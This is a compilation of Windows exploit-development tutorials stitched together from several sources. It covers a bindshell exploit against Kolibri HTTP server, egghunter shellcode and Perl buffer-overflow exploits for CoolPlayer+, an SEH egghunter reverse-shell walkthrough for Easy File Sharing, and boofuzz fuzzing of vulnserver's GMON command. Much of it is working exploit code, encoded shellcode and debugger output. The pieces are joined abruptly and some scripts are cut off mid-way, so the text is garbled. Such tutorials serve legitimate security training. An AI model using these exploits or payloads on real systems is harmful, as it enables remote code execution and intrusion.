"\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71"
"\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71"
"\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d"
"\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46"
"\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36"
"\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e"
"\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66"
"\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b"
"\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58"
"\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56"
"\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75"
"\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61"
"\x43\x4b\x4f\x4b\x65\x41\x41")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
# Stage2: #
# (*) For reliability we use the x86/alpha_mixed encoder (we have as much space #
# badcharacters. #
# (4) We embed the final stage payload in the HTTP header, which will be put #
# somewhere in memory at the time of the initial crash, b00m Game Over!! #
#-------------------------------------------------------------------------------#
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
In the screenshot below you can see Kolibri receiving our evil HTTP request and the output of
“netstat -an” showing that our bindshell is listening and below that the output when we
connect to it, b00m Game Over!!
Game Over!
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
Default Gateway . . . . . . . . . :
http://www.fuzzysecurity.com/tutorials/expDev/4.html
• First, you must have a minimum amount of predictable memory to which you can
jump that holds the small Egghunter code.
• Second, your shellcode must be available in its entirety somewhere in memory (on the
stack or heap).
Keep in mind because we’re dealing with a limited buffer space, the Egghunter itself should be
as small as possible to be useful in these situations. To understand the details behind
Egghunting, your first resource should be Matt Miller’s (skape) paper titled “Safely Searching
Process Virtual Address Space”. In it, he describes the various methods in which one can use
Egghunters to search available memory in order to locate and execute otherwise difficult-to-
find exploit code. He provides several Linux and Windows-based examples, some optimized
more than others. For the purposes of this tutorial I’m only going to focus on the smallest (only
32 bytes), most optimized Windows version, which uses NtDisplayString. Please note that this
method only works on 32-bit NT versions of Windows. All the examples that follow were
tested on Window XP SP3. I’ll limit the discussion for now until I get into 64-bit Windows-based
exploits in later posts.
• Use the EIP overwrite to jump to a predictable location that holds a small Assembly
language routine (the “Egghunter”) which searchers memory for the “egg” and, when
found, jumps to it to execute the shellcode.
The egg will be a 4 byte string, repeated once. Let’s say our string is “PWND”, the egg we will
prepend to our shellcode will be PWNDPWND. The reason for the repetition is to ensure that
when we locate it in memory, we can verify we’ve actually found our shellcode (and not a
random collection of 4 bytes, or the Egghunter routine itself) — it’s simply a way to double
check we’ve reached our shellcode.
The Egghunter we’re going to implement will use (abuse) NtDisplayString, a read-only function
that is designed to take a single argument — a pointer to a string — and display it.
IN PUNICODE_STRING String
);
Instead of using the function to display strings as intended, we’re going to sequentially work
our way through memory address pointers and pass them to it, one at a time. If the function
returns an access violation error when it attempts to read from that memory location, we
know we’ve reached an unaccessible portion of memory and must look elsewhere for our
shellcode. If it doesn’t return an error, we know we can examine the contents of that memory
location for our egg. It’s a simple and elegant solution to testing the availability of memory to
look for our egg. Here’s the code (adapted from Skape’s original version found here). Note: in
that version, he uses NtAccessCheckAndAuditAlarm instead of NtDisplayString. As he explains
in his paper (see earlier link) they both serve the same purpose and the only difference in
terms of the code is the syscall number.
entry:
loop_inc_page:
or dx, 0x0fff // loop through memory pages by adding 4095 decimal or PAGE_SIZE-1 to edx
loop_inc_one:
inc edx // loop through addresses in the memory page one by one
make_syscall:
push edx // push edx value (current address) onto the stack to save for future reference
push 0x43 // push 0x43 (the Syscall ID for NtDisplayString) onto the stack
pop eax // pop 0x43 into eax to use as the parameter to syscall
int 0x2e // issue the interrupt to call NtDisplayString kernel function
check_is_valid:
cmp al, 0x05 // compare low order byte of eax to 0x5 (5 = access violation)
pop edx // restore edx from the stack
jz loop_inc_page // if the zf flag was set by cmp instruction there was an access violation
// and the address was invalid so jmp back to loop_inc_page
is_egg:
mov eax, 0x444e5750 // if the address was valid, move the egg into eax for comparison
mov edi, edx // set edi to the current address pointer in edx for use in the scasd instruction
scasd // compares value in eax to dword value addressed by edi (current address pointer)
// and sets EFLAGS register accordingly; after scasd comparison,
// EDI is automatically incremented by 4 if DF flag is 0 or decremented if flag is 1
jnz loop_inc_one // egg not found? jump back to loop_inc_one
scasd // first 4 bytes of egg found; compare the dword in edi to eax again
// (remember scasd automatically advanced by 4)
jnz loop_inc_one // only the first half of the egg was found; jump back to loop_inc_one
found:
jmp edi //egg found!; thanks to scasd, edi now points to shellcode
I’ve included a C version below in case you want to compile it and load it into a debugger as a
stand-alone .exe to follow along (please note that your addresses are likely going to vary).
https://www.securitysift.com/download/egghunter.c
Let’s walk through the code in detail, starting from loop_inc_page. First, the or instruction cues
up the next memory page to search by adding page_size – 1 (or 4095) to the current address
in EDX and stores the result in EDX. The next instruction increments the value of EDX by 1. This
effectively brings us to the very first address in the page we want to search. You might wonder
why we just didn’t put 4096 into EDX, instead of breaking it into two instructions. The reason is
because we need to maintain two separate loops — one to loop through each page and the
other to loop through each address of a valid page one by one.
As we increment through each address, we make the call to NtDisplayString to see if it’s valid.
Before we do, the value in EDX must be saved to the stack since we need to return to that
location after the syscall; otherwise it will be clobbered by the syscall instruction. After
saving EDX, we load the syscall number of NtDisplayString (43) into EAX. [If you want to find
the numbers to the various Windows syscalls, check out this
resource: http://j00ru.vexillium.org/ntapi/ ]
With EDX saved and the syscall parameter loaded into EAX, we’re ready to issue the interrupt
and make the syscall. Once the syscall is made, EAX will be loaded with 0x5 if the attempt to
read that memory location resulted in an access violation. If this happens, we know we’re
attempting to read from an inaccessible memory page, so we go back to loop_inc_page and
the next memory page is loaded to into EDX.
This page loop will continue until a valid memory page is found.
Once a valid memory address is found, the execution flows diverts to is_egg. Now that it’s
located a valid address, the next step is to compare our egg to the contents of that address. To
do so, we load the egg into EAX and move (copy) our valid address from EDX to EDI for use by
the next SCASD instruction.
You might wonder why we don’t just compare the value in EAX to the value in EDX directly. It’s
because using the SCASD instruction is actually more effecient since it not only sets us up for
the following jump instruction but it also automatically increments EDI by 4 bytes after each
comparison. This allows us to check both halves of the egg and immediately jump to our
shellcode once an egg is found, without the need for unnecessary Assembly instructions.
If the contents of EAX and the contents pointed to by the memory address in EDI don’t match,
we haven’t found our egg so execution flow loops back to the INC EDX instruction which will
grab the next address within the current page for comparison.
Once the first half of the egg is found, the SCASD instruction is repeated to check for the
second half. If that’s also a match, we know we’ve found our egg so we jump to EDI, which
thanks to the SCASD instruction, now points directly to our shellcode.
Now that you understand how the Egghunter works, let’s see how to incorporate it into our
exploit payload. I’ll once again use the CoolPlayer exploit from Part 4. If you recall, from Part 4,
at the time of EIP overwrite, ESP points to only a small portion of our buffer — too small for
our shellcode, but more than enough space for an Egghunter. Let’s update our previous exploit
script.
First, we need to obtain the opcodes for the Assembly instructions and convert them to hex
format for our Perl script. Depending on how you write the Egghunter (MASM, C, etc) there
are varying ways in which you can extract the associated opcode. For this demo, I’m simply
going to grab them from Immunity during runtime of my Egghunter executable (compiled from
the C code I provided earlier).
If you use this method, you can copy it to the clipboard or export it to a file and then convert it
to script-friendly hex using any number of command line scripts such as this:
$egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x50\x57\x4
E\x44\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
For the purposes of this demo, I’ll break up the hex with comments so you can easily match it
to the corresponding Assembly instruction. Here it is incorporated into the exploit script we
wrote in Part 4:
#!/usr/bin/perl
#############################################################################
##############
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow Shellcode Jump Demo
# Date: 12-24-2013
# Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Tested On: Windows XP SP3
# Based on original POC exploit: http://www.exploit-db.com/exploits/4839/
# Details: Egghunter Demo
#############################################################################
##############
my $junk = "\x90" x 260; # nops to slide into $jmp; offset to eip overwrite at 260
my $eip = pack('V',0x7c86467b); # jmp esp [kernel32.dll]
my $egghunter = "\x66\x81\xCA\xFF\x0F"; # or dx,0x0fff
$egghunter = $egghunter . "\x42"; # inc edx by 1
$egghunter = $egghunter . "\x52"; # push edx to t
$egghunter = $egghunter . "\x6A\x43"; # push byte +0x43
$egghunter = $egghunter . "\x58"; # pop eax
$egghunter = $egghunter . "\xCD\x2E"; # int 0x2e
$egghunter = $egghunter . "\x3C\x05"; # cmp al,0x5
$egghunter = $egghunter . "\x5A"; # pop edx
$egghunter = $egghunter . "\x74\xEF"; # jz 0x0
$egghunter = $egghunter . "\xB8\x50\x57\x4e\x44"; # mov eax,PWND
$egghunter = $egghunter . "\x8B\xFA"; # mov edi,edx
$egghunter = $egghunter . "\xAF"; # scasd
$egghunter = $egghunter . "\x75\xEA"; # jnz 0x5
$egghunter = $egghunter . "\xAF"; # scasd
$egghunter = $egghunter . "\x75\xE7";#jnz 0x5
$egghunter = $egghunter . "\xFF\xE7"; #jmp edi
Also note I added the $egg and incorporated both it and the Egghunter into the $sploit portion
of the buffer. Try the resulting .m3u file in CoolPlayer+ and you should get …
If you look closely, you’ll note that although we see the start of our shellcode (prefaced by
“PWNDPWND”) the shellcode is not intact, which is what caused our exploit to crash. This
corrupted version of our shellcode is the first to appear in memory and the Egghunter is not
smart enough to know the difference — it’s only designed to execute the instructions after the
first “PWNDPWND” it finds. An Egghunter exploit might still be possible, provided our
shellcode resides intact somewhere in memory.
The first two entries marked as “[Stack]” both appear in the previous screenshot and both are
corrupted versions of our shellcode. That leaves the third entry from the Heap. Double-click
that entry to view it in memory.
Perfect, it’s intact. But how do we get our otherwise “dumb” Egghunter to skip the first two
corrupted entries in memory and execute the third? We have a few choices.
If we have a scenario that calls for the use of an Egghunter but successful exploit is being
hindered by the presence of multiple, corrupted copies of our shellcode we could:
• Add some additional error checking to our Egghunter (“Egg Sandwich” Egghunter)
One of the simplest methods of addressing this problem is to “push” the shellcode further into
memory so the early copies are never made and (hopefully) the first copy the Egghunter
reaches is intact.
Let’s try it with our CoolPlayer exploit. Add a new variable $offset and insert it into the buffer
as follows:
This time the offset pushed the shellcode far enough into our buffer so that no corrupted
copies were placed on the stack and only the intact copy from the heap remains.
If we can predict where the corrupted copies are going to reside, we can simply tell the
Egghunter to start looking after those memory addresses. This could probably be done any
number of ways, but for this demo I’ll use an existing register and the ADD instruction.
From the previous mona search, we know both corrupted copies reside
at 0x0012F1AC and 0x0012F31C so all we need to do is start our Egghunter after these
addresses. To do so, we need to change the value of ebx before the first memory page is
loaded.
Launch the exploit as-is and pause execution at the very beginning of the the Egghunter
routine to examine the stack. Specifically, look at ESP:
We need to start beyond 0x0012F31C. Subtract ESP from that and you get: 0x190 or 400
decimal. Therefore we can load EDX with ESP and then add at 400+ to EDX to push the starting
memory page beyond the corrupted shellcode. An updated version of the Egghunter is below.
Note I had to break up the ADD EDX instruction to avoid NULLs.
Here is EDX (and our new starting memory page) after executing the new mov/add
instructions:
We’ve successfully pushed past the corrupted shellcode. Continue execution and …
Since one of the key features of a useful Egghunter is to be as small as possible, these extra 14
bytes of instructions can be seen as a negative, but if you have the space, it’s a viable option.
Alternatively, you may consider trying to come up with more efficient methods of loading EBX
with a larger address.
The idea behind the Omelette Egghunter is to break up your shellcode into multiple chunks,
each prefaced with its own egg as well as an additional tag that contains two pieces of
information: 1) an indicator as to whether it is the last chunk of shellcode and 2) the length of
the shellcode chunk.
This approach can be useful if you know your shellcode gets corrupted when kept in large
chunks but can stay intact if its divided into small enough pieces. At a high level it works like
this:
$shellcode = \x41\x41\x41\41\x42\x42\x42\x42\x43\x43\x43\x43;
Left as-is, there is not enough space in memory to house it in its entirety, so we want to break
it up into three chunks. We’ll use the same egg (PWNDPWND). We also need to append a two
byte tag to this egg. The first byte is the chunk identifier — you can use any identifier but the
last chunk must be different that the preceding chunks so the Egghunter knows when it has
reached the end of the shellcode. You could use \x01 for the last chunk and \x02 for all
preceding chunks. The second byte is the size of the shellcode chunk. In this rudimentary
example, all three chunks will be 4 bytes in length so the second byte of the tag will be \x04.
Note that since the size is stored as a single byte, each chunk is limited to 255 bytes in size.
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\x04\x41\x41\x41\x41"
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\x04\x42\x42\x42\x42"
"\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\x04\x43\x43\x43\x43"
The Omelette Egghunter code locates each of the chunks and writes them, in order, to the
stack to reassemble and execute the shellcode. I’m not going explain the Omelette Egghunter
code but I encourage you take a look at an example
here: http://www.thegreycorner.com/2013/10/omlette-egghunter-shellcode.html.
It’s a very useful concept but does have some flaws. First, the shellcode chunks must be placed
into memory in order, something you might not have control over. Second, the reassembled
shellcode is written to ESP and you risk writing over something important, including the
Egghunter itself. (I’ve experienced both of these problems). Third, to take advantage of this
added functionality, you sacrifice size — the omelette example found at the above link is 53
bytes vs. 32 bytes for the NtDisplayString Egghunter. Also, similar to
the NtDisplayString Egghunter, it will grab the first egg-prepended shellcode it reaches in
memory without means to verify whether it is a corrupted copy.
Despite these potential shortcomings, the Omelette Egghunter might be right for certain
situations so keep it in mind.
When I was considering various solutions for broken shellcode I thought it should be possible
to have the Egghunter validate the integrity of the shellcode before executing to ensure it had
found an intact version. That way, there would be no need to worry how many corrupt
versions of the shellcode might reside in memory and no reason to worry about changing
offsets or memory pages. Also, in exploits such as the one for CoolPlayer, since an intact copy
does reside somewhere in memory, there would be no need to break the shellcode up into
smaller chunks (as in the Omelette example).
The prepended egg also contains a two byte tag similar to the Omelette Egghunter — the first
byte identifies the egg number (\x01) and the second byte is the offset to the second egg
(equal to the length of the shellcode). The second appended egg would also contain a two byte
tag — the first byte is the egg number (\x02) and the second byte is the offset to the beginning
of the shellcode (equal to the length of shellcode + length of the second egg).
Assuming we use our 227 byte calc.exe shellcode and our egg of PWNDPWND, the first egg in
the Egg Sandwich would look as follows:
\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\xe3
\x50\x57\x4e\x44\x50\x57\x4e\x44\x02\xeb
Note the first egg’s size tag is \xe3 (or 227, the length of the shellcode) while the second
is \xeb (shellcode + 8 = 235).
The Egghunter code locates the first egg as normal. It then reads the egg number tag to verify
it has found the first egg and uses the offset tag to jump the appropriate number of bytes to
the second egg. It then checks to make sure the second found egg is in fact the appended egg
(by verifying its number) and then uses the offset tag to jump back to the beginning of the
shellcode to execute.
Any corrupted copies of the shellcode that have had bytes added or subtracted in any way will
fail the second egg check and be skipped. The only way a corrupted egg would pass this
verification step would be if it maintained the exact same number of bytes as the original.
Here is the Perl exploit script for CoolPlayer+ modified with the Egg Sandwich Egghunter code:
#!/usr/bin/perl
#############################################################################
##############
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow Shellcode Jump Demo
# Date: 12-24-2013
# Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Tested On: Windows XP SP3
# Based on original POC exploit: http://www.exploit-db.com/exploits/4839/
# Details: Egg Sandwich Egghunter Demo
#############################################################################
##############
my $junk = "\x90" x 260; # nops to slide into $jmp; offset to eip overwrite at 260
my $eip = pack('V',0x7c86467b); # jmp esp [kernel32.dll]
# loop_inc_page:
my $egghunter = "\x66\x81\xca\xff\x0f"; # OR DX,0FFF ; get next page
# loop_inc_one:
$egghunter = $egghunter . "\x42"; # INC EDX ; increment EDX by 1 to get next memory address
# check_memory:
$egghunter = $egghunter . "\x52"; # PUSH EDX ; save current address to stack
$egghunter = $egghunter . "\x6a\x43"; # PUSH 43 ; push Syscall for NtDisplayString to stack
$egghunter = $egghunter . "\x58"; # POP EAX ; pop syscall parameter into EAX for syscall
$egghunter = $egghunter . "\xcd\x2e"; # INT 2E ; issue interrupt to make syscall
$egghunter = $egghunter . "\x3c\x05"; # CMP AL,5 ; compare low order byte of eax to 0x5
(indicates access violation)
$egghunter = $egghunter . "\x5a"; # POP EDX ; restore EDX from the stack
$egghunter = $egghunter . "\x74\xef"; # JE SHORT ;if zf flag = 1, access violation, jump to
loop_inc_page
# check_egg
$egghunter = $egghunter . "\xb8\x50\x57\x4e\x44"; # MOV EAX,444E5750 ; valid address,
move egg value (PWND) into EAX for comparison
$egghunter = $egghunter . "\x8b\xfa"; # MOV EDI,EDX ; set edi to current address pointer for
use in scasd
$egghunter = $egghunter . "\xaf"; # SCASD ; compare value in EAX to dword value addressed
by EDI
# ; increment EDI by 4 if DF flag is 0 or decrement if 1
$egghunter = $egghunter . "\x75\xea"; # JNZ SHORT ; egg not found, jump back to
loop_inc_one
$egghunter = $egghunter . "\xaf"; # SCASD ; first half of egg found, compare next half
$egghunter = $egghunter . "\x75\xe7"; # JNZ SHORT ; only first half found, jump back to
loop_inc_one
# found_egg
$egghunter = $egghunter . "\x8b\xf7"; # MOV ESI,EDI ; first egg found, move start address of
shellcode to ESI for LODSB
$egghunter = $egghunter . "\x31\xc0"; # XOR EAX, EAX ; clear EAX contents
$egghunter = $egghunter . "\xac"; # LODSB ; loads egg number (1 or 2) into AL
$egghunter = $egghunter . "\x8b\xd7"; # MOV EDX,EDI ; move start of shellcode into EDX
$egghunter = $egghunter . "\x3c\x01"; # CMP AL,1 ; determine if this is the first egg or last egg
$egghunter = $egghunter . "\xac"; # LODSB ; loads size of shellcode from $egg1 into AL
$egghunter = $egghunter . "\x75\x04"; # JNZ SHORT ; cmp false, second egg found, goto
second_egg
# first_egg
$egghunter = $egghunter . "\x01\xc2"; # ADD EDX, EAX ; increment EDX by size of shellcode to
point to 2nd egg
$egghunter = $egghunter . "\x75\xe3"; # JNZ SHORT ; jump back to check_egg
# second_egg
$egghunter = $egghunter . "\x29\xc7"; # SUB EDI, EAX ; decrement EDX to point to start of
shellcode
$egghunter = $egghunter . "\xff\xe7"; # JMP EDI ; execute shellcode
my $nops = "\x90" x 50;
my $egg1 = "\x50\x57\x4e\x44\x50\x57\x4e\x44\x01\xe3"; # egg = PWNDPWND; id = 1; offset
to egg2 = 227
https://www.securitysift.com/download/egg_sandwich.c
I wouldn’t be surprised if I wasn’t the first to think of this “Egg Sandwich” approach, though I
couldn’t find any other references. It does have some disadvantages:
• In its current state it accommodates a single byte for the offset size tag, meaning the
shellcode is limited to 255 bytes or smaller. That could be adjusted, though it will likely
increase the size of the Egghunter code.
Anyway, at the very least it may get you thinking of other ways to implement Egghunters or
maybe even improve upon this one.
https://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-
egghunting/
The first step is to find the parameters in the web app vulnerable to a buffer overflow. So let's
send an HTTP request to the webserver with a payload of 4200 bytes in the GET request. You
can opt for a bigger payload if the program does not crash.
We are using the above Python script to send our payload to the server.
Let's also have a look at the immunity debugger as we send the payload.
Here we see our first access violation. In the EDI register, we can see that there is a SQL table
in the background and the instruction is making a query to the database. The file name can be
as long as we want. Let’s see how we can exploit this to get remote code execution on the
webserver.
From the above image, we can see that the webserver crashed and the EIP (Instruction
Pointer) is overwritten with the As from our payload (\x41=A).
Let's also have a look at the rest of the overwritten buffer. If the rest of the buffer is loaded
intact into the memory we can overwrite EIP with an instruction to redirect the execution flow
to the memory section where our shellcode resides. Before we move to shellcode - we should
check for bad characters. For this, we will follow the same process of loading all possible hex
characters into our payload and execute it. Then we will check the memory for missing
characters or broken sequences and then take care to avoid such characters in our shellcode to
be executed.
Now let's have a look at the buffer we overwritten in the step above.
Here we can see that our payload is overwriting the Structured Exception Handler.
SEH
SEH can be described as a list of functions that tries to solve an upcoming exception. Here the
function will try to solve the exception by one handler after another until the exception is
solved or there is no handler left and the program will crash.
Finding Offset
Here we want the program to handle this exception. From the image above we can see that
we have overwritten the SE handler and also the pointer to the next SE handler. To control the
SE handler we need to find the exact offset that is overwritten by the payload in the buffer on
the SE handler.
To do that we can create a unique pattern of strings using the Metasploit module and then
query the contents of the SE handler to the same module to find the location of exact
overwrite.
After doing the same we find the offset to be at 4065 bytes as shown in the image.
To exploit a buffer overflow in such a situation we will use the technique of pop-pop-ret. In
this technique, the first SEH handler must point to a pop-pop-ret instruction. Here return will
make sure that the execution comes back to the address just before the SEH handler. To do
this we pop the top 2 values of the stack and return to the next value (pop - pop - ret).
So whatever we write here will be considered as assembly language and we will put an
instruction for a short jump in here that will skip the exception handler and start executing our
shellcode we inject in the buffer.
Here we can start writing our shellcode 6 - 10 characters ahead of SEH handler and instruct the
pointer to next SEH record to jump onto our shellcode.
So now let's find out the next location of the SEH handler using mona pattern_offset.
Here we are overwriting the next SEH after 4065 bytes and nSEH will be at 4061 bytes.
Let’s now find out all the modules that come with the application so that we can use a pop -
pop -ret instruction already present in the application by just giving the nSEH location of this
instruction.
Then open the seh.txt file in the Windows OS. Here we will search for instruction -
And then copy the address of the same and replace it with the code that will be executed on
SEH.
Before copying this address make sure that the ASLR and SAFE SEH bits are set to false and it is
not an instruction from the OS library.
Let's set up a breakpoint on the above address in the immunity debugger to see the execution
in action.
Once the RETN inst executed we will reach our JMP SHORT instruction.
Now it’s time to replace our nops with a working payload to get code execution for the shell.
After injecting my shellcode in this nops area and trying to get it executed - due to some
reason only a first few bytes would get executed and the payload would then fail.
Egg Hunter
Here we can use an ‘ Egg Hunter ‘ payload. The egg hunter is composed of a set of
programmatic instructions that are translated to opcode and in that respect, it is no different
than any other shellcode. The purpose of this shellcode is to search the entire memory range
for our final stage shellcode and redirect execution flow to it.
To do that we have another parameter here where we can inject our payload - that is the User-
Agent. When we write an egg hunter it will be a 4-byte string. If by default if we use mona it
will be “w00t”.
We will put this in front of our payload so that it understands that our shellcode to be
executed lies ahead and pass the execution to it. We will write it twice so that the egg hunter
does not find itself in the memory (hunter is 1 time w00t and egg is 2 times).
Let’s use the egg hunter from the file provided with mona.
For payload 2 we will just create a TCP reverse shellcode that will give us code execution and
inject it in the ‘ User-Agent ’. Link to the code for reference is provided in the references. Let’s
now see this in action again.
Exploit
Here the egghunter searches for the occurrence of strings w00t twice in the memory
recursively. Now let’s set a breakpoint at SCAS DWORD PTR ES:[EDI] as shown below to pause
execution once it finds an occurrence of ‘ w00t ‘ string.
We see that the hunter seems to have found itself or a random occurrence of the string in the
memory but it will recurse again to find the string again in the same order. Now set the
breakpoint at JMP EDI - as EDI will be the location of our payload and let the execution
continue.
Here we see that the egg hunter has found our egg and the payload that precedes the egg.
Now set up a handler on the attacking machine to receive the shell once our payload executes
and let the execution continue.
Here we can see that the execution has jumped to our payload and we have a shell on our
target system.
References :
https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-
hunting/
https://www.fuzzysecurity.com/tutorials/expDev/4.html
https://github.com/haxxorrR/security/blob/master/EasyFileSharingBufferOverflow/Overflow.p
y
https://techjoomla.com/blog/beyond-joomla/seh-buffer-overflow-exploitation-using-
egghunter-payload
https://www.youtube.com/watch?v=JEPNdhyOxo0
LAB ENVIRONMENT
• Architecture: x86
• Debugger: WinDbg
• Fuzzer: boofuzz
o mona.py
In case you’re missing anything listed above (excluding vulnserver), check out OSCE Exam
Practice - Part I (Lab Setup).
DISCLAIMER: This series of posts is geared toward diving deeper on more modern tooling
(boofuzz, windbg, mona, et al) as well as gaining proficiency/efficiency with exploit
development. It’s not a guide for the how-to portion of writing a PoC (even though I step
through things slowly, I don’t explain things to that level of detail). I assume if you’re here to
look at OSCE practice examples, you probably don’t need the step-by-step instructions for
every little thing. With all that said, I hope you find something useful!
• Lab Setup
INTRODUCTION
Welcome back! In this post we’ll develop an exploit for vulnserver’s GMON command using an
SEH overwrite and an egg hunter. Based off of the work done in Part II, we have a lot of ready
made templates located in the companion repository. These templates will speed up exploit
dev considerably. Additionally, we won’t be spending as much time on things already covered
in Part II. If something comes completely out of left field and you want me to expand upon it,
just drop me a line!
FUZZING
BOOFUZZ SCRIPT
We’ll begin by fuzzing the GMON command. GMON handles input similarly to how TRUN did in
the last post. Due to our awesome foresight, we can make a small modification to
the fuzzing.py found in the repo and be off to the races.
Start out by cloning the repository (or on windows downloading the zip). Once that’s done,
copy the TEMPLATE_DIR directory and name the copy GMON. We should have a new folder
with the below structure.
├── GMON
│ ├── final-poc
│ │ └── exploit.py
│ ├── find-offset
│ │ └── exploit.py
│ ├── fuzzing
│ │ └── fuzzer.py
│ ├── id-bad-chars
│ │ └── exploit.py
│ └── initial-crash
│ └── exploit.py
To the following
55s_string("GMON", fuzzable=False)
FUZZING DETOUR
One thing of note, I made a second modification to boofuzz during this fuzzing session. I kept
getting socket.error: [Errno 10054] An existing connection was forcibly closed by the remote
host on the process_monitor.py side of things. After googling around, I found this boofuzz
issue which talks about the same problem but not specifically about process_monitor.py.
After digging around using the traceback to guide me, i made the following change
to boofuzz\monitors\pedrpc.py
3--- a/boofuzz/monitors/pedrpc.py
4+++ b/boofuzz/monitors/pedrpc.py
6 try:
7 self.__client_sock.shutdown(socket.SHUT_RDWR)
8 except socket.error as e:
9- if e.errno == errno.ENOTCONN:
11 pass
12 else:
13 raise
14
All this does is prevent the exception being raised when process_monitor.py encounters this
particular socket error. After making this change, all fuzzing sessions have ran to completion.
DISCLAIMER: Making this change may have unintended consequences. So far I’ve successfully
fuzzed GMON and KSTET with this change in place, but who knows…
Follow Up: Twitter user @Ramon_JCFK told me they were still getting 10054 errors even after
making the two suggested changes to boofuzz. We ensured that he had the changes in place
correctly but still came up short. He let me know later that running process_monitor.py on
windows and then the fuzzer from kali worked. So, that’s another option available if fuzzing
from windows isn’t working out.
Terminal 1:
C:\Python27\python.exe C:\Users\vagrant\Downloads\boofuzz-master\process_monitor.py
═══════════════════════════════════════════
[06:23.08] # records: 0
Terminal 2:
C:\Python37\python.exe .\fuzzer.py
══════════════════════════════════
...
CRASHES
Our fuzzing yields two crashes. We can see the relevant context dumps below, showing we’re
able to overwrite EIP.
CONTEXT DUMP
EIP: 41414141 Unable to disassemble at 41414141
CONTEXT DUMP
Fortunately, there is only one boofuzz test case sent that uses capital A’s (it’s also the same
fuzz string used in the TRUN PoC). If you need a refresher on going from the crashes to the
payload sent and its length, check out the boofuzz-results Database section of Part II.
Similar to our fuzzer, we just need to change the following lines in our template.
5CRASH_LEN = 0 # change me
To the following
Well, we have the crash, but EIP doesn’t hold 41414141. We can check the to see if our fuzz
string made it into the SEH chain.
WINDBG !EXCHAIN
Windbg’s !exchain extension displays the list of exception handlers for the current thread. The
list begins with the first handler on the chain (the one that is given the first opportunity to
handle an exception) and continues on to the end.
!exchain
════════
018effc4: 41414141
To determine the offset, we’ll use mona to create a cyclic pattern and update our next
template.
This time, we’ll update GMON\find-offset\exploit.py (notice the directory) and change lines 4-
11 from
5CRASH_LEN = 0 # change me
6OFFSET = 0 # change me
10payload = VULNSRVR_CMD
to
6OFFSET = 0 # change me
10payload = VULNSRVR_CMD
11payload += b"Aa0Aa1Aa2Aa3Aa4A..."
With that done, we’ll hook up windbg again and send the find-offset PoC. Once execution
stops, we can run findmsp to determine the offset.
════════════════
Hold on...
- Stack pivot between 34 & 3606 bytes needed to land in this pattern
SEH record (nseh field) at 0x01acffc4 overwritten with normal pattern : 0x6e45316e (offset
3514), followed by 52 bytes of cyclic data after the handler
0x01acf20c : Contains normal cyclic pattern at ESP+0x24 (+36) : offset 2, length 3572 (->
0x01acffff : ESP+0xe18)
[+] Examining stack (entire stack) - looking for pointers to cyclic pattern
0x01acf164 : Pointer into normal cyclic pattern at ESP-0x84 (-132) : 0x01acfc60 : offset
2646, length 928
0x01acf168 : Pointer into normal cyclic pattern at ESP-0x80 (-128) : 0x01acf7a0 : offset
1430, length 2144
- Folder created
- (Re)setting logfile c:\monalogs\vulnserver_2684\findmsp.txt
- Processing modules
There we go, the offset to the nSEH field is 3514! There’s an important piece of information on
that same line. It tells us there is only 52 bytes of cyclic data after the handler. That limits what
shellcode we can insert after the nSEH field. We’ll come back to this a little later.
Now that we know the offset, let’s update our PoC and confirm it.
Our updated script will look like what’s below. We update the OFFSET variable with 3514.
Additionally, we comment out the cyclic pattern. Finally, we un-comment lines 14-16.
1import struct
2import socket
6OFFSET = 3514
10payload = VULNSRVR_CMD
12
17
20
21 sent = sock.send(payload)
22 print(f"sent {sent} bytes")
When sending the above code, we expect to see 4 B’s in the nSEH field after running !exchain.
Firing up windbg and throwing again confirms that’s what happens.
!exchain
════════
01a1ffc4: 43434343
